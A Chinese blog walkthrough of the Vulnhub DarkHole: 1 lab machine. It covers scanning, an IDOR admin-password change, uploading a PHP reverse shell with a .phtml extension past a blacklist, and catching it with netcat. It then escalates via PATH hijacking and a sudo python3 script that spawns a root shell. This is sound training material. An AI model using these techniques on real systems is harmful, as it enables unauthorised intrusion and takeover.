Vulnhub-DARKHOLE: 1渗透

前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.103
  • 靶机IP:192.168.2.129靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. 越权操作
  2. 文件上传绕过
  3. 修改环境绕过命令限制
  4. sudo python提权

开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述
可以看到,开放的端口还是比较的多
发现了几个常用端口服务22/ssh 80/http

22/sshssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息才使用这个

80/http基本上大部分的漏洞都是存在于web服务上,我们访问看看,如下图。有一个login,我们点击看看能不能登录
在这里插入图片描述

这个界面试了一下万能密码和跑了sqlmap,然而并没有什么用,干脆就点击注册看看注册页面有没有什么东西
在这里插入图片描述

二、越权操作

我们将注册好的账户登录,界面很简单,就一个改密码的功能,但是我们观察URL发现有一个id的GET亲求参数,这里就可以猜测一些越权改密
在这里插入图片描述

那么我们就在上图修改密码的地方输入一个密码,用Burpsuite抓一下包,把id修改为1(猜的id为1的时候是admin用户)
然后点击send发送修改好的数据包
在这里插入图片描述

三、文件上传

发送成功之后,我们再用admin用户与刚刚改的密码进行登录,发现成功登录并且修改了admin的密码
并且再这个页面发现了一个上传点,如下图
在这里插入图片描述

我们先在kali输入下面的命令拷贝一份kali自带的php反弹shell并命名为getshell.php
在这里插入图片描述

使用mousepad编辑这个拷贝下来的文件,修改监听的IP和端口
这里ip修改为自己的kali(攻击机)的ip即可,端口的话可自定义,这里我就用1234了。如下图
在这里插入图片描述

在这里用nc监听1234端口用来接收返回下来的shell。如下图
在这里插入图片描述

上述步骤操作完之后现在就可以上传马了
跑了一遍测试脚本,发现这里有一个.phtml的后缀不在黑名单内,可以直接进行绕过,如下图,操作完之后直接发送即可
在这里插入图片描述

这里点击一下file,如下图,我们的nc监听的端口就可以获取到shell了
在这里插入图片描述

四、获取用户shell

如下是获取shell之后的内容

┌──(root㉿kali)-[~/tools]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.100.34: inverse host lookup failed: Unknown host
connect to [192.168.100.7] from (UNKNOWN) [192.168.100.34] 36700
#这里使用python升级一下shll
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@darkhole:/var/www/html/upload$ 

#看一下home目录有哪些目录
www-data@darkhole:/var/www/html/upload$ ls /home
darkhole
john

#发现了john用户,我们到其家目录看看
www-data@darkhole:/var/www/html/upload$ cd /home/john

ls -al看看当前目录的文件,发现了一个toto的可执行文件
在这里插入图片描述
./toto运行一下,发现执行了id命令,那么思路就来了,我们可以通过修改环境变量来获取一个用户shell

在这里插入图片描述

如下是操作步骤

#在/tmp/目录下面创建一个id文件
www-data@darkhole:/home/john$ echo '/bin/bash' > /tmp/id

#给这个id文件一个执行权限
www-data@darkhole:/home/john$ chmod +x /tmp/id

#把tmp目录添加到环境变量里面
www-data@darkhole:/home/john$ export PATH=/tmp:$PATH

#再次执行toto文件
www-data@darkhole:/home/john$ ./toto

#使用终端优化
python3 -c 'import pty;pty.spawn("/bin/bash")'

#使用whoami命令,已成功拿到john用户
john@darkhole:/home/john$ whoami
john
john@darkhole:/home/john$ 

ls看看当前目录发现了一个password文件,cat看看,发现了一个密码
在这里插入图片描述

五、提权

用这里密码使用sudo -l看看能够用sudo执行的命令,发现了还真的有干货
在这里插入图片描述

#通过如下命令修改file.py文件,便我们提权
john@darkhole:/home/john$ echo "import os" > file.py
john@darkhole:/home/john$ echo 'os.system("/bin/bash")' >> file.py

#用cat命令检查一下
john@darkhole:/home/john$ cat file.py
import os
os.system("/bin/bash")

#使用sudo提权
john@darkhole:/home/john$ sudo /usr/bin/python3 /home/john/file.py
[sudo] password for john: root123

root@darkhole:/home/john#
root@darkhole:/home/john# cd /root/
cd /root/
root@darkhole:~# ls
root.txt  snap

#查看flag文件,靶机渗透结束
root@darkhole:~# cat root.txt
DarkHole{You_Are_Legend}


  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂搞网安的18岁老登

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值